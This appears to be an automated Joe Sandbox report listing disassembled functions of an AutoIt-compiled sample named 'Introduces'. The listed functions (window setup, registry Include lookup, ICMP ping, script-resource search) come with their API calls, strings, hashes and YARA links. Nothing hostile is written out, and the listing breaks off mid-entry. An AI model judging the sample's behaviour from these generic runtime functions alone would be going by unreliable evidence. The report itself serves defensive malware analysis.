String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 224292ebe1abb512a8a4bdd7e133ae29fd37e54fb8779befc5d7c976dabf31b2
Instruction ID: 55c5cd0c78662ae6692037ffa98e32bb80cd0b703dbc2bb08f35dc3689a76591
Opcode Fuzzy Hash: 224292ebe1abb512a8a4bdd7e133ae29fd37e54fb8779befc5d7c976dabf31b2
Instruction Fuzzy Hash: A83114B184430AEFDB90DFE4E888BDDBBF0FB08310F10421AE590A62A1D3B51586CF91

Function 009F3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 009F3444
RegisterClassExW.USER32(00000030), ref: 009F346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F347F
InitCommonControlsEx.COMCTL32(?), ref: 009F349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F34AC
LoadIconW.USER32(000000A9), ref: 009F34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F34D1

Strings

TaskbarCreated, xrefs: 009F3474
AutoIt v3 GUI, xrefs: 009F3460
0, xrefs: 009F3426
+, xrefs: 009F342D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 03c03c9c72e8afd7f397591560bd8e16b7eb99c254e94caa87796b088711a6aa
Instruction ID: e5c5296fdf5eaaecc83e54382f7e85282e9eee746ba4d057490ebc14b62fb67a
Opcode Fuzzy Hash: 03c03c9c72e8afd7f397591560bd8e16b7eb99c254e94caa87796b088711a6aa
Instruction Fuzzy Hash: C221B2B1904219AFEB40DFE4EC89B9DBBF4FB08710F10421AF915A62A1D7B1558ACF91

Function 00A02FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A100CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A03094), ref: 00A100ED

Part of subcall function 00A108C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A0309F), ref: 00A108E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A030E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A401BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A401FB
RegCloseKey.ADVAPI32(?), ref: 00A40239
_wcscat.LIBCMT ref: 00A40292

Strings

\Include\, xrefs: 00A0309F
Include, xrefs: 00A401B1, 00A401F2
Software\AutoIt v3\AutoIt, xrefs: 00A030D8
\, xrefs: 00A402B5

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 5c6c4fbc4e9c47b9bd05ae8accf6d92dd3477f9ac14ea0527f1222c204de904b
Instruction ID: 5b331d3a1b2d30d71ed4c7f80c6c12f1bc4ec2375f51be3b24b9a817b61c0d06
Opcode Fuzzy Hash: 5c6c4fbc4e9c47b9bd05ae8accf6d92dd3477f9ac14ea0527f1222c204de904b
Instruction Fuzzy Hash: B4716C715093059EC704EFA9E9819EBBBECFF98340F40062EF555862B2EF709949CB52

Function 00A0514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A05156
LoadCursorW.USER32(00000000,00007F00), ref: 00A05165
LoadIconW.USER32(00000063), ref: 00A0517C
LoadIconW.USER32(000000A4), ref: 00A0518E
LoadIconW.USER32(000000A2), ref: 00A051A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A051C6
RegisterClassExW.USER32(?), ref: 00A0521C

Part of subcall function 009F3411: GetSysColorBrush.USER32(0000000F), ref: 009F3444
Part of subcall function 009F3411: RegisterClassExW.USER32(00000030), ref: 009F346E
Part of subcall function 009F3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F347F
Part of subcall function 009F3411: InitCommonControlsEx.COMCTL32(?), ref: 009F349C
Part of subcall function 009F3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F34AC
Part of subcall function 009F3411: LoadIconW.USER32(000000A9), ref: 009F34C2
Part of subcall function 009F3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F34D1

Strings

#, xrefs: 00A05201
0, xrefs: 00A051FA
AutoIt v3, xrefs: 00A0520B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 1fddc9380337111407ea1930677de128aea8a0649109bb9ed45a93c5155c8004
Instruction ID: 17ec7987e766511ae3351c2a7c7f96600507b662903e0d09d808f37b8375202c
Opcode Fuzzy Hash: 1fddc9380337111407ea1930677de128aea8a0649109bb9ed45a93c5155c8004
Instruction Fuzzy Hash: 0A2137B1D04308AFEB11DFE4ED09B9D7BB4FB88710F00425AF604A62B2D7B659568F84

Function 00A65E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00A65E7E
inet_addr.WSOCK32(?,?,?), ref: 00A65EC3
gethostbyname.WS2_32(?), ref: 00A65ECF
IcmpCreateFile.IPHLPAPI ref: 00A65EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A65F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A65F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A65FD8
WSACleanup.WSOCK32 ref: 00A65FDE

Strings

Ping, xrefs: 00A65F01

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: e340cafe476d385adcc9077d6d6acd44042e89f6e05674cd719c217919710c07
Instruction ID: 74c128dd1177e4d958f4251ff836b7bf33da1f8c528dc3a6cee3156d3e2655fe
Opcode Fuzzy Hash: e340cafe476d385adcc9077d6d6acd44042e89f6e05674cd719c217919710c07
Instruction Fuzzy Hash: 4F515C31A046019FDB20EF65DD49F2AB7F4EF88720F144529FA96DB2A1DB70E905CB42

Function 00A04D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00A04E22
KillTimer.USER32(?,00000001), ref: 00A04E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A04E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A04E7A
CreatePopupMenu.USER32 ref: 00A04E8E
PostQuitMessage.USER32(00000000), ref: 00A04EAF

Strings

TaskbarCreated, xrefs: 00A04E75

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: a2ce22916f940fe1ba979542d043883bc3ce2819b3bcd14104e7c1c9c46ddafd
Instruction ID: 982ef872278ab13c7766fe4d86dc12b1316cdc2e8ff5afcb6397b3df4f8821e5
Opcode Fuzzy Hash: a2ce22916f940fe1ba979542d043883bc3ce2819b3bcd14104e7c1c9c46ddafd
Instruction Fuzzy Hash: 5D41E5B160860EABEB159FA4FD09BFE36A9FBC8340F040625F701911F3DAB49C51A761

Function 00A056F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A40C5B

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

_memset.LIBCMT ref: 00A05787
_wcscpy.LIBCMT ref: 00A057DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A057EB
__swprintf.LIBCMT ref: 00A40CD1

Strings

AutoIt - , xrefs: 00A05760
Line %d: , xrefs: 00A40CCB

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: 97321ca2a1714d20ced187d8d4541a7272bd06e024a5ab5d9003dba88a2f2d2f
Instruction ID: 4f419797fa00387e3646cecb7841b57f0bcc918165827bd3765a330c3ff6d68a
Opcode Fuzzy Hash: 97321ca2a1714d20ced187d8d4541a7272bd06e024a5ab5d9003dba88a2f2d2f
Instruction Fuzzy Hash: B2419671408309AAD321EBA0ED85FDF77ECAF84350F104A1EF585920E2EB749649CB96

Function 00A050DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A05109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A0512A
ShowWindow.USER32(00000000), ref: 00A0513E
ShowWindow.USER32(00000000), ref: 00A05147

Strings

edit, xrefs: 00A05124
AutoIt v3, xrefs: 00A05101, 00A05106, 00A05107

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0422c4ca30151ba08e2aa5151db0568d86f62b9028e29e9e7c5b576fa8966c3c
Instruction ID: b60966afb97d49403a0ee58438ece439f782be72b9ee85cbee99e2b204c1a990
Opcode Fuzzy Hash: 0422c4ca30151ba08e2aa5151db0568d86f62b9028e29e9e7c5b576fa8966c3c
Instruction Fuzzy Hash: 3FF0FE715452947EEB7197A76C4CEBB3E7DE7C6F50F00021EB900A22B2C6B11852DBB0

Function 00A59B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00A04A8C: _fseek.LIBCMT ref: 00A04AA4

Part of subcall function 00A59CF1: _wcscmp.LIBCMT ref: 00A59DE1
Part of subcall function 00A59CF1: _wcscmp.LIBCMT ref: 00A59DF4

_free.LIBCMT ref: 00A59C5F
_free.LIBCMT ref: 00A59C66
_free.LIBCMT ref: 00A59CD1

Part of subcall function 00A12F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00A19C54,00000000,00A18D5D,00A159C3), ref: 00A12F99
Part of subcall function 00A12F85: GetLastError.KERNEL32(00000000,?,00A19C54,00000000,00A18D5D,00A159C3), ref: 00A12FAB

_free.LIBCMT ref: 00A59CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00A59B8F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: 7b041d12b0a4872497cdd386667c04a1d7676e2088142deb2ff9b8edf2f914c3
Instruction ID: bd3156433253170894e0c79f671f2578e5277f62fa7696b959d6b70c7d1224b3
Opcode Fuzzy Hash: 7b041d12b0a4872497cdd386667c04a1d7676e2088142deb2ff9b8edf2f914c3
Instruction Fuzzy Hash: E9515CB1E04218AFDF24DF64DD45AAEBBB9FF48304F00049EB649A7381DB715A948F58

Function 00A1563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A1569B
_memcpy_s.LIBCMT ref: 00A1570D
__read_nolock.LIBCMT ref: 00A1576B
__filbuf.LIBCMT ref: 00A1578E
_memset.LIBCMT ref: 00A157D2

Part of subcall function 00A18D58: __getptd_noexit.LIBCMT ref: 00A18D58

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: b6e2948d0bfc911a149b0f689c21c15b82cd0a3093a253c56df8e5a084aba664
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: CF519330E00B05DBDB249FB9D9856EE77B5AF81320F288B29F875962D0D7709DD09B80

Function 009F52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F52E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F534A
TranslateMessage.USER32(?), ref: 009F5356
DispatchMessageW.USER32(?), ref: 009F5360

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 4bda7c26340c4843ebde2dfe43169fe3a5d35a84ea931bdc3c5c4d04f633385a
Instruction ID: 440fee1a706d750830fe535323ed24f5cc0a25b1445b5434d6a1fce43584ed58
Opcode Fuzzy Hash: 4bda7c26340c4843ebde2dfe43169fe3a5d35a84ea931bdc3c5c4d04f633385a
Instruction Fuzzy Hash: A731F43090870ADBEB30CBAC9C44FF977E89B41344F254569E722961E2D7F59886D711

Function 009F1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009F1275,SwapMouseButtons,00000004,?), ref: 009F12A8
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009F1275,SwapMouseButtons,00000004,?), ref: 009F12C9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,009F1275,SwapMouseButtons,00000004,?), ref: 009F12EB

Strings

Control Panel\Mouse, xrefs: 009F12A6

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 57c768a56986adf2791966a11beab6b6ccef29466a4597f936413df1668e13f0
Instruction ID: 3965be5401dcaa374e112e95678b5cb79f9ce39799781271764c64898146aa22
Opcode Fuzzy Hash: 57c768a56986adf2791966a11beab6b6ccef29466a4597f936413df1668e13f0
Instruction Fuzzy Hash: 2811337161020CFEDB208FA4D884EFEBBBCEF04744B104569E945D7220E2719E449BA0

Function 00A05B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A05B58

Part of subcall function 00A056F8: _memset.LIBCMT ref: 00A05787
Part of subcall function 00A056F8: _wcscpy.LIBCMT ref: 00A057DB
Part of subcall function 00A056F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A057EB

KillTimer.USER32(?,00000001,?,?), ref: 00A05BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A05BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A40D7C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 23d0804061c15e4302028cfbcd4d14a6838f9ce053fb69fdd97f54810c2461cb
Instruction ID: 02d80593ec7413d3e5397d2adb4dd76c50b44953253946b585fcd1ded128a6e5
Opcode Fuzzy Hash: 23d0804061c15e4302028cfbcd4d14a6838f9ce053fb69fdd97f54810c2461cb
Instruction Fuzzy Hash: 1421F574D04B889FEB72CB749895FEBBFECAF42304F04048DE69A56181D3746989DB41

Function 00A0278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00A049C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A027AF,?,00000001), ref: 00A049F4

_free.LIBCMT ref: 00A3FB04
_free.LIBCMT ref: 00A3FB4B

Part of subcall function 00A029BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A02ADF

Strings

Bad directive syntax error, xrefs: 00A3FB33

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 7980fa3272521139b6fadcb5b68e4588b43b25f5218f5094110ab8b77b68ff22
Instruction ID: 58099b45349da2fc7ab27a5606720596c7645638e3ff7aa02a8bff27b599acf6
Opcode Fuzzy Hash: 7980fa3272521139b6fadcb5b68e4588b43b25f5218f5094110ab8b77b68ff22
Instruction Fuzzy Hash: DC916B71D10219AFCF04EFA4DD919EEB7B8BF09350F14456AF816AB2A1DB30AA45CB50

Function 00A59CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A04AB2: __fread_nolock.LIBCMT ref: 00A04AD0

_wcscmp.LIBCMT ref: 00A59DE1
_wcscmp.LIBCMT ref: 00A59DF4

Strings

FILE, xrefs: 00A59D2D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: f1a4ceba5063784ba6b3082e59188cc1475a3f30c0cc4f2423abdbffd7399a09
Instruction ID: 412ecf5b2773906c379f1695cbf3bffd280595c543b495d786ba00ead1a4030f
Opcode Fuzzy Hash: f1a4ceba5063784ba6b3082e59188cc1475a3f30c0cc4f2423abdbffd7399a09
Instruction Fuzzy Hash: EF41B472A40209BADF21DBA4DC46FEF77BDEF49710F00446AFA00AB1C1D671994887A5

Function 00A031BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A4032B
GetOpenFileNameW.COMDLG32(?), ref: 00A40375

Part of subcall function 00A10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A02A58,?,00008000), ref: 00A102A4

Part of subcall function 00A109C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A109E4

Strings

X, xrefs: 00A40343

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: ae7562fad31aea7a79947b09d1a64fe04ca94599a7a0b2dc805ed5788f65d4ff
Instruction ID: ac56488490b0bced4e8493e740a0e15aae343ee88aefed7788ecda3701325457
